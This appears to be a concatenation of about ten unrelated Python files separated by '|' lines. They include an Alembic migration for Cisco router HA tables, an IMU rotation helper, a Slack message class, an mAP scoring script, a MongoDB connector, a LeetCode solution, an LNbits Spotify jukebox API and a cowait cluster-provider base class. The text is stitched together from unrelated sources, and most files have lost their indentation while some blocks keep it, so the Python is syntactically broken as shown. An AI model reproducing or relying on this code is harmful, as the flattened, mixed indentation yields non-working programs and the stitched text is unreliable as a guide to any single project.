down_revision = '2921fe565328'
from alembic import op
import sqlalchemy as sa
from networking_cisco.plugins.cisco.extensions import ha
ha_states = sa.Enum('ACTIVE', 'STANDBY', name='ha_states')
def upgrade():
op.create_table('cisco_router_ha_settings',
sa.Column('router_id', sa.String(36), nullable=True),
sa.Column('ha_type', sa.String(255), nullable=True),
sa.Column('redundancy_level', sa.Integer,
server_default=str(ha.MIN_REDUNDANCY_LEVEL)),
sa.Column('priority', sa.Integer, nullable=True),
sa.Column('probe_connectivity', sa.Boolean, nullable=True),
sa.Column('probe_target', sa.String(64), nullable=True),
sa.Column('probe_interval', sa.Integer, nullable=True),
sa.Column('state', ha_states, server_default='ACTIVE'),
sa.ForeignKeyConstraint(['router_id'], ['routers.id'],
ondelete='CASCADE'),
sa.PrimaryKeyConstraint('router_id')
)
op.create_table('cisco_router_ha_groups',
sa.Column('tenant_id', sa.String(length=255), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('ha_type', sa.String(255), nullable=True),
sa.Column('group_identity', sa.String(255), nullable=True),
sa.Column('ha_port_id', sa.String(36), nullable=False),
sa.Column('extra_port_id', sa.String(36), nullable=True),
sa.Column('subnet_id', sa.String(36), nullable=True),
sa.Column('user_router_id', sa.String(36), nullable=True),
sa.Column('timers_config', sa.String(255), nullable=True),
sa.Column('tracking_config', sa.String(255), nullable=True),
sa.Column('other_config', sa.String(255), nullable=True),
sa.ForeignKeyConstraint(['ha_port_id'], ['ports.id'],
ondelete='CASCADE'),
sa.ForeignKeyConstraint(['extra_port_id'], ['ports.id'],
ondelete='SET NULL'),
sa.ForeignKeyConstraint(['subnet_id'], ['subnets.id']),
sa.ForeignKeyConstraint(['user_router_id'], ['routers.id']),
sa.PrimaryKeyConstraint('ha_port_id')
)
op.create_table('cisco_router_redundancy_bindings',
sa.Column('redundancy_router_id', sa.String(36)),
sa.Column('priority', sa.Integer),
sa.Column('state', ha_states, server_default='STANDBY'),
sa.Column('user_router_id', sa.String(36)),
sa.ForeignKeyConstraint(['redundancy_router_id'], ['routers.id'],
ondelete='CASCADE'),
sa.ForeignKeyConstraint(['user_router_id'], ['routers.id']),
sa.PrimaryKeyConstraint('redundancy_router_id')
)
|
import numpy as np
def R_cam_imu_matrix():
# IMU origo/pos given in camera coordinate
imuOrigo_cam = np.array([0.71, 1.34, -3.53])
print("See geogebra sketch\n")
# Rotation matrix to rotate from IMU to camera coordinates
# First rotate yaw of 8.303 degrees
def R_z(yaw_deg):
y = yaw_deg * np.pi / 180
return np.array([
[np.cos(y), -np.sin(y), 0],
[np.sin(y), np.cos(y), 0],
[0, 0, 1]])
R_zxy_xyz = np.array([
[0, 1, 0],
[0, 0, 1],
[1, 0, 0]])
print("Array x vector given in IMU, this can be ferries forward acceleration:\t", end="")
xVec_imu = np.array([3.60000, 0.10000, -1.3400]) # camera origo given in imu
print(xVec_imu)
R_cam_imu = R_zxy_xyz @ R_z(-13)
print("Same vector given in camera: \t\t\t\t\t\t", end="")
print(R_cam_imu @ xVec_imu)
print("Use this to rotate IMU acc data and euler angles")
# RTK origo given in IMU
rtkOrigo_imu = np.array([-0.025, 0.1, 0.06])
print("Assume that they have same origo, too small offset")
return R_cam_imu, rtkOrigo_imu, R_zxy_xyz
|
from procedural.calculadora import calcular, calcular_prefixa
if __name__ == '__main__':
print(calcular())  # infix
print(calcular_prefixa())
|
from slacky.attachment import SlackAttachment
from slacky.base import SlackObject
from .sender import SlackMessageSender
class SlackMessage(SlackObject):
def __init__(self, text=None, attachments=None):
self.text = text or ''
self.attachments = attachments or []
def send(self, channel, token):
sender = SlackMessageSender(token)
return sender.send(self, channel)
def send_ephemeral(self, channel, user_id, token):
sender = SlackMessageSender(token)
return sender.send_ephemeral(self, channel, user_id)
def update(self, channel, ts, token):
sender = SlackMessageSender(token)
return sender.update(self, channel, ts)
def delete(self, channel, ts, token):
sender = SlackMessageSender(token)
return sender.delete(channel, ts)
def get_text(self):
return self.text
def get_attachments(self):
return [
a.as_dict() for a in self.attachments
]
def copy(self):
    # Shallow copy: the text is copied, the attachment list is duplicated
    # but the attachment objects themselves are shared.
    return SlackMessage(text=self.text, attachments=list(self.attachments))
@classmethod
def from_dict(cls, message_dict):
m = message_dict.copy()
m['attachments'] = []
for a in message_dict['attachments']:
m['attachments'].append(SlackAttachment.from_dict(a))
return cls(**m)
def as_dict(self):
return {
'text': self.get_text(),
'attachments': [a.as_dict() for a in self.attachments]
}
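# Hypothetical usage sketch (token, channel id, and attachment payload below
# are placeholders, not part of the original module):
#
#     msg = SlackMessage(text="Deploy finished")
#     msg.attachments.append(SlackAttachment.from_dict({"text": "build ok"}))
#     msg.send(channel="C0123456789", token="xoxb-...")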
|
import os
import pandas as pd
import numpy as np
import torch
import random
from HPAutils import *
import cv2
import imgaug as ia
from imgaug import augmenters as iaa
ia.seed(0)
import sys
def mAP(PREDS='', DATASET='custom', XLS=True, return_details=False):
#ROOT = 'D:\\HPA\\test'
if XLS:
truthpaths = {'custom': 'F:\\probabilities_truth_custom.csv',
'custom512': 'F:\\todo'}
else:
truthpaths = {'custom': 'X:\\truth_submission.csv',
'custom512': 'F:\\TestFiles512\\truth_submission.csv'}
TRUTH = truthpaths[DATASET]
truth = pd.read_csv(TRUTH).to_numpy()
if isinstance(PREDS, str):
preds = pd.read_csv(PREDS).to_numpy()
else:
preds = PREDS
if XLS:
assert(np.array_equal(truth[:,0:2], preds[:,0:2]))
stats = []
if XLS:
for truth_row, pred_row in zip(truth, preds):
for i in range(2, len(pred_row)):
if truth_row[i] == 1.0:
stats.append([i-2, 1, pred_row[i]])
else:
stats.append([i-2, 0, pred_row[i]])
else:
for truth_row, pred_row in zip(truth, preds):
bits = truth_row[3].split(' ')
p_bits = pred_row[3].split(' ')
assert(len(bits) % 3 == 0)
assert(len(bits) == len(p_bits))
for i, bit, p_bit in zip(range(0, len(bits)), bits, p_bits):
if i % 3 == 0:
label = int(bit)
if i % 3 == 1:
value = float(bit)
prob = float(p_bit)
if i % 3 == 2:
# Determine value of prediction
if value == 1.0: # True
stats.append([label, 1, prob])
else:
stats.append([label, 0, prob])
# Get all of the confidence data into a dataframe
stats_df = pd.DataFrame(data=stats, columns=['Label', 'State', 'Confidence'])
stats_sorted = stats_df.sort_values(by='Confidence', ascending=True)
aucs = []
for label in range(0, len(LBL_NAMES)):
lbl_stats = stats_sorted.loc[stats_sorted['Label'] == label].values
# True positives starts at the number of total positives and decreases from there
precision = 0.0
max_precision = 0.0
recall = 1.0
old_recall = 1.0
old_precision = 0.0
prior_confidence = 0.0
auc = 0.0
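# Sweep the unique confidence values as thresholds (lowest to highest); at each
# threshold, rows from idx onward are treated as positive predictions.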
unique, indices = np.unique(ar=lbl_stats[:, 2], return_index=True)
for conf, idx in zip(unique, indices):
tp = lbl_stats[idx:, 1].sum()
fn = lbl_stats[:idx, 1].sum()
fp = (len(lbl_stats) - idx) - tp
# Calc new precision recall values
recall = float(tp) / float(tp + fn)
precision = float(tp) / float(tp + fp)
if recall < old_recall:
if precision < max_precision: # Should check for change in recall value in order to update the max
precision = max_precision
else:
max_precision = precision
# Increment AUC
# Rectangle portion
rect = old_precision * (old_recall - recall)
auc += rect
# Triangle portion
triangle = 0.5 * (precision - old_precision) * (old_recall - recall)
auc += triangle
old_recall = recall
old_precision = precision
# Do final (0, 1) point
rect = old_precision * old_recall
auc += rect
# Triangle portion
triangle = 0.5 * (1 - old_precision) * old_recall  # interpolate up to the (recall=0, precision=1) point
auc += triangle
if not return_details:
print('AUC for Label ' + str(label) + ": " + "{0:.1%}".format(auc))
aucs.append(auc)
print("mAP Score: " + "{0:.2%}".format(np.average(np.array(aucs))))
return aucs
if __name__ == '__main__':
print('%s: calling main function ... \n' % os.path.basename(__file__))
mAP()
print('\nsuccess!')
|
from typing import NewType
from motor.motor_asyncio import AsyncIOMotorClient
from chat_room.core.config import settings as s
DBClient = NewType("DBClient", AsyncIOMotorClient)
class DataBase:
client: DBClient = None
db = DataBase()
async def get_database() -> DBClient:
return db.client
async def connect_to_database():
db.client = AsyncIOMotorClient(
s.MONGODB_URL,
maxPoolSize=s.MAX_CONNECTIONS_COUNT,
minPoolSize=s.MIN_CONNECTIONS_COUNT,
)
async def close_database_connection():
db.client.close()
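# Hypothetical FastAPI wiring sketch (the app object is an assumption, not part
# of this module):
#
#     from fastapi import FastAPI
#     app = FastAPI()
#     app.add_event_handler("startup", connect_to_database)
#     app.add_event_handler("shutdown", close_database_connection)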
|
class Solution:
def maximumProduct(self, nums):
nums.sort()
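# After sorting, the maximum product of three numbers is either the product of
# the three largest values, or the product of the two smallest (possibly both
# negative) values and the largest value.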
a, b, c = nums[:3]  # three smallest
e, d, f = nums[-3:]  # three largest
return max(e * d * f, a * b * f)
slu = Solution()
print(slu.maximumProduct([1, 2, 2, 3]))
|
import base64
import json
from http import HTTPStatus
import httpx
from fastapi import Request
from fastapi.param_functions import Query
from fastapi.params import Depends
from starlette.exceptions import HTTPException
from starlette.responses import HTMLResponse # type: ignore
from lnbits.core.services import create_invoice
from lnbits.core.views.api import api_payment
from lnbits.decorators import WalletTypeInfo, require_admin_key
from . import jukebox_ext
from .crud import (
create_jukebox,
create_jukebox_payment,
delete_jukebox,
get_jukebox,
get_jukebox_payment,
get_jukeboxs,
update_jukebox,
update_jukebox_payment,
)
from .models import CreateJukeboxPayment, CreateJukeLinkData
@jukebox_ext.get("/api/v1/jukebox")
async def api_get_jukeboxs(
req: Request,
wallet: WalletTypeInfo = Depends(require_admin_key),
all_wallets: bool = Query(False),
):
wallet_user = wallet.wallet.user
try:
jukeboxs = [jukebox.dict() for jukebox in await get_jukeboxs(wallet_user)]
return jukeboxs
except:
raise HTTPException(status_code=HTTPStatus.NO_CONTENT, detail="No Jukeboxes")
##################SPOTIFY AUTH#####################
@jukebox_ext.get("/api/v1/jukebox/spotify/cb/{juke_id}", response_class=HTMLResponse)
async def api_check_credentials_callback(
juke_id: str = Query(None),
code: str = Query(None),
access_token: str = Query(None),
refresh_token: str = Query(None),
):
sp_code = ""
sp_access_token = ""
sp_refresh_token = ""
try:
jukebox = await get_jukebox(juke_id)
except:
raise HTTPException(detail="No Jukebox", status_code=HTTPStatus.FORBIDDEN)
if code:
jukebox.sp_access_token = code
jukebox = await update_jukebox(jukebox, juke_id=juke_id)
if access_token:
jukebox.sp_access_token = access_token
jukebox.sp_refresh_token = refresh_token
jukebox = await update_jukebox(jukebox, juke_id=juke_id)
return "<h1>Success!</h1><h2>You can close this window</h2>"
@jukebox_ext.get("/api/v1/jukebox/{juke_id}")
async def api_check_credentials_check(
juke_id: str = Query(None), wallet: WalletTypeInfo = Depends(require_admin_key)
):
jukebox = await get_jukebox(juke_id)
return jukebox
@jukebox_ext.post("/api/v1/jukebox", status_code=HTTPStatus.CREATED)
@jukebox_ext.put("/api/v1/jukebox/{juke_id}", status_code=HTTPStatus.OK)
async def api_create_update_jukebox(
data: CreateJukeLinkData,
juke_id: str = Query(None),
wallet: WalletTypeInfo = Depends(require_admin_key),
):
if juke_id:
jukebox = await update_jukebox(data, juke_id=juke_id)
else:
jukebox = await create_jukebox(data, inkey=wallet.wallet.inkey)
return jukebox
@jukebox_ext.delete("/api/v1/jukebox/{juke_id}")
async def api_delete_item(
juke_id=None, wallet: WalletTypeInfo = Depends(require_admin_key)
):
await delete_jukebox(juke_id)
try:
return [{**jukebox} for jukebox in await get_jukeboxs(wallet.wallet.user)]
except:
raise HTTPException(status_code=HTTPStatus.NO_CONTENT, detail="No Jukebox")
################JUKEBOX ENDPOINTS##################
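# The Spotify endpoints below share a retry pattern: on a 401/403 response the
# stored access token is refreshed via api_get_token() and the call is retried
# once (retry=True); if the retry also fails an HTTP error is raised.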
######GET ACCESS TOKEN######
@jukebox_ext.get("/api/v1/jukebox/jb/playlist/{juke_id}/{sp_playlist}")
async def api_get_jukebox_song(
juke_id: str = Query(None),
sp_playlist: str = Query(None),
retry: bool = Query(False),
):
try:
jukebox = await get_jukebox(juke_id)
except:
raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail="No Jukeboxes")
tracks = []
async with httpx.AsyncClient() as client:
try:
r = await client.get(
"https://api.spotify.com/v1/playlists/" + sp_playlist + "/tracks",
timeout=40,
headers={"Authorization": "Bearer " + jukebox.sp_access_token},
)
if "items" not in r.json():
if r.status_code == 401:
token = await api_get_token(juke_id)
if token == False:
return False
elif retry:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN,
detail="Failed to get auth",
)
else:
return await api_get_jukebox_song(
juke_id, sp_playlist, retry=True
)
return r
for item in r.json()["items"]:
tracks.append(
{
"id": item["track"]["id"],
"name": item["track"]["name"],
"album": item["track"]["album"]["name"],
"artist": item["track"]["artists"][0]["name"],
"image": item["track"]["album"]["images"][0]["url"],
}
)
except:
something = None
return [track for track in tracks]
async def api_get_token(juke_id=None):
try:
jukebox = await get_jukebox(juke_id)
except:
raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail="No Jukeboxes")
async with httpx.AsyncClient() as client:
try:
r = await client.post(
"https://accounts.spotify.com/api/token",
timeout=40,
params={
"grant_type": "refresh_token",
"refresh_token": jukebox.sp_refresh_token,
"client_id": jukebox.sp_user,
},
headers={
    "Content-Type": "application/x-www-form-urlencoded",
    "Authorization": "Basic "
    + base64.b64encode(
        str(jukebox.sp_user + ":" + jukebox.sp_secret).encode("ascii")
    ).decode("ascii"),
},
)
if "access_token" not in r.json():
return False
else:
jukebox.sp_access_token = r.json()["access_token"]
await update_jukebox(jukebox, juke_id=juke_id)
except:
something = None
return True
######CHECK DEVICE
@jukebox_ext.get("/api/v1/jukebox/jb/{juke_id}")
async def api_get_jukebox_device_check(
juke_id: str = Query(None), retry: bool = Query(False)
):
try:
jukebox = await get_jukebox(juke_id)
except:
raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail="No Jukeboxes")
async with httpx.AsyncClient() as client:
rDevice = await client.get(
"https://api.spotify.com/v1/me/player/devices",
timeout=40,
headers={"Authorization": "Bearer " + jukebox.sp_access_token},
)
if rDevice.status_code == 204 or rDevice.status_code == 200:
return json.loads(rDevice.text)
elif rDevice.status_code == 401 or rDevice.status_code == 403:
token = await api_get_token(juke_id)
if token == False:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN, detail="No devices connected"
)
elif retry:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN, detail="Failed to get auth"
)
else:
return await api_get_jukebox_device_check(juke_id, retry=True)
else:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN, detail="No device connected"
)
######GET INVOICE STUFF
@jukebox_ext.get("/api/v1/jukebox/jb/invoice/{juke_id}/{song_id}")
async def api_get_jukebox_invoice(juke_id, song_id):
try:
jukebox = await get_jukebox(juke_id)
except:
raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail="No jukebox")
try:
devices = await api_get_jukebox_device_check(juke_id)
deviceConnected = False
for device in devices["devices"]:
if device["id"] == jukebox.sp_device.split("-")[1]:
deviceConnected = True
if not deviceConnected:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND, detail="No device connected"
)
except:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND, detail="No device connected"
)
invoice = await create_invoice(
wallet_id=jukebox.wallet,
amount=jukebox.price,
memo=jukebox.title,
extra={"tag": "jukebox"},
)
payment_hash = invoice[0]
data = CreateJukeboxPayment(
invoice=invoice[1], payment_hash=payment_hash, juke_id=juke_id, song_id=song_id
)
jukebox_payment = await create_jukebox_payment(data)
return data
@jukebox_ext.get("/api/v1/jukebox/jb/checkinvoice/{pay_hash}/{juke_id}")
async def api_get_jukebox_invoice_check(
pay_hash: str = Query(None), juke_id: str = Query(None)
):
try:
await get_jukebox(juke_id)
except:
raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail="No jukebox")
try:
status = await api_payment(pay_hash)
if status["paid"]:
await update_jukebox_payment(pay_hash, paid=True)
return {"paid": True}
except:
return {"paid": False}
return {"paid": False}
@jukebox_ext.get("/api/v1/jukebox/jb/invoicep/{song_id}/{juke_id}/{pay_hash}")
async def api_get_jukebox_invoice_paid(
song_id: str = Query(None),
juke_id: str = Query(None),
pay_hash: str = Query(None),
retry: bool = Query(False),
):
try:
jukebox = await get_jukebox(juke_id)
except:
raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail="No jukebox")
await api_get_jukebox_invoice_check(pay_hash, juke_id)
jukebox_payment = await get_jukebox_payment(pay_hash)
if jukebox_payment.paid:
async with httpx.AsyncClient() as client:
r = await client.get(
"https://api.spotify.com/v1/me/player/currently-playing?market=ES",
timeout=40,
headers={"Authorization": "Bearer " + jukebox.sp_access_token},
)
rDevice = await client.get(
"https://api.spotify.com/v1/me/player",
timeout=40,
headers={"Authorization": "Bearer " + jukebox.sp_access_token},
)
isPlaying = False
if rDevice.status_code == 200:
isPlaying = rDevice.json()["is_playing"]
if r.status_code == 204 or isPlaying == False:
async with httpx.AsyncClient() as client:
uri = ["spotify:track:" + song_id]
r = await client.put(
"https://api.spotify.com/v1/me/player/play?device_id="
+ jukebox.sp_device.split("-")[1],
json={"uris": uri},
timeout=40,
headers={"Authorization": "Bearer " + jukebox.sp_access_token},
)
if r.status_code == 204:
return jukebox_payment
elif r.status_code == 401 or r.status_code == 403:
token = await api_get_token(juke_id)
if token == False:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN,
detail="Invoice not paid",
)
elif retry:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN,
detail="Failed to get auth",
)
else:
                            return await api_get_jukebox_invoice_paid(
song_id, juke_id, pay_hash, retry=True
)
else:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN, detail="Invoice not paid"
)
elif r.status_code == 200:
async with httpx.AsyncClient() as client:
r = await client.post(
"https://api.spotify.com/v1/me/player/queue?uri=spotify%3Atrack%3A"
+ song_id
+ "&device_id="
+ jukebox.sp_device.split("-")[1],
timeout=40,
headers={"Authorization": "Bearer " + jukebox.sp_access_token},
)
if r.status_code == 204:
return jukebox_payment
elif r.status_code == 401 or r.status_code == 403:
token = await api_get_token(juke_id)
if token == False:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN,
detail="Invoice not paid",
)
elif retry:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN,
detail="Failed to get auth",
)
else:
                            return await api_get_jukebox_invoice_paid(
                                song_id, juke_id, pay_hash, retry=True
                            )
else:
raise HTTPException(
status_code=HTTPStatus.OK, detail="Invoice not paid"
)
elif r.status_code == 401 or r.status_code == 403:
token = await api_get_token(juke_id)
if token == False:
raise HTTPException(
status_code=HTTPStatus.OK, detail="Invoice not paid"
)
elif retry:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN, detail="Failed to get auth"
)
else:
                    return await api_get_jukebox_invoice_paid(
                        song_id, juke_id, pay_hash, retry=True
                    )
raise HTTPException(status_code=HTTPStatus.OK, detail="Invoice not paid")
############################GET TRACKS
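# Returns the track currently playing on the jukebox owner's Spotify account,
# refreshing the access token once on a 401 before failing.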
@jukebox_ext.get("/api/v1/jukebox/jb/currently/{juke_id}")
async def api_get_jukebox_currently(
retry: bool = Query(False), juke_id: str = Query(None)
):
try:
jukebox = await get_jukebox(juke_id)
except:
raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail="No jukebox")
async with httpx.AsyncClient() as client:
try:
r = await client.get(
"https://api.spotify.com/v1/me/player/currently-playing?market=ES",
timeout=40,
headers={"Authorization": "Bearer " + jukebox.sp_access_token},
)
if r.status_code == 204:
raise HTTPException(status_code=HTTPStatus.OK, detail="Nothing")
elif r.status_code == 200:
try:
response = r.json()
track = {
"id": response["item"]["id"],
"name": response["item"]["name"],
"album": response["item"]["album"]["name"],
"artist": response["item"]["artists"][0]["name"],
"image": response["item"]["album"]["images"][0]["url"],
}
return track
except:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND, detail="Something went wrong"
)
elif r.status_code == 401:
token = await api_get_token(juke_id)
if token == False:
raise HTTPException(
                        status_code=HTTPStatus.FORBIDDEN, detail="Invoice not paid"
)
elif retry:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN, detail="Failed to get auth"
)
else:
return await api_get_jukebox_currently(retry=True, juke_id=juke_id)
else:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND, detail="Something went wrong"
)
except:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND, detail="Something went wrong"
)
|
from __future__ import annotations
from abc import abstractmethod
from typing import Iterable
from cowait.tasks import TaskDefinition, RemoteTask
from cowait.utils import EventEmitter
from .const import ENV_TASK_CLUSTER, ENV_TASK_DEFINITION, ENV_GZIP_ENABLED, MAX_ENV_LENGTH
from .errors import ProviderError
from .utils import env_pack
class ClusterProvider(EventEmitter):
    def __init__(self, type, args=None):
        super().__init__()
        self.type = type
        self.args = args if args is not None else {}
@abstractmethod
def spawn(self, taskdef: TaskDefinition) -> RemoteTask:
""" Spawn a task in the cluster """
raise NotImplementedError()
@abstractmethod
def destroy(self, task_id: str) -> None:
""" Destroy a task """
raise NotImplementedError()
@abstractmethod
def destroy_all(self) -> None:
raise NotImplementedError()
@abstractmethod
def destroy_children(self, parent_id: str) -> None:
raise NotImplementedError()
@abstractmethod
def wait(self, task: RemoteTask) -> bool:
""" Wait for task to exit. Returns True on clean exit. """
raise NotImplementedError()
@abstractmethod
def logs(self, task_id: str) -> Iterable[str]:
""" Stream logs from task """
raise NotImplementedError()
@abstractmethod
def list_all(self) -> list:
raise NotImplementedError()
def serialize(self) -> dict:
""" Serialize ClusterProvider into a dict """
return {
'type': self.type,
**self.args,
}
def find_agent(self):
return None
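# Illustrative sketch only (not part of cowait): a do-nothing provider showing
# which methods a concrete ClusterProvider is expected to implement. The class
# name and its trivial bodies are hypothetical placeholders, not a real backend.
class NullClusterProvider(ClusterProvider):
    def __init__(self, args=None):
        super().__init__(type='null', args=args or {})
    def spawn(self, taskdef: TaskDefinition) -> RemoteTask:
        # A real provider would schedule a container or pod here and wrap it
        # in a RemoteTask; this placeholder simply refuses.
        raise ProviderError('null provider cannot spawn tasks')
    def destroy(self, task_id: str) -> None:
        pass
    def destroy_all(self) -> None:
        pass
    def destroy_children(self, parent_id: str) -> None:
        pass
    def wait(self, task: RemoteTask) -> bool:
        # Nothing was spawned, so report a clean exit.
        return True
    def logs(self, task_id: str) -> Iterable[str]:
        return iter(())
    def list_all(self) -> list:
        return []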
|
# -*- coding: utf-8; -*-
from __future__ import unicode_literals
import json
# TODO: update with more specific exceptions
class RegistryException(Exception):
def __init__(self, response):
self.response = response
if hasattr(response, 'content'):
try:
data = json.loads(response.content)
                self.message = data.get('error', "An unknown error occurred.")
except:
self.message = "Unable to contact registry at '{0}'. Status {1}.".format(response.request.url, response.status_code)
else:
self.message = "There was an issue with the request to the docker registry."
super(RegistryException, self).__init__(self.message)
def __str__(self):
return super(RegistryException, self).__str__()
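# Illustrative usage only (`resp` below is a hypothetical HTTP response object,
# e.g. from the `requests` library):
#     resp = session.get(manifest_url)
#     if resp.status_code >= 400:
#         raise RegistryException(resp)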
|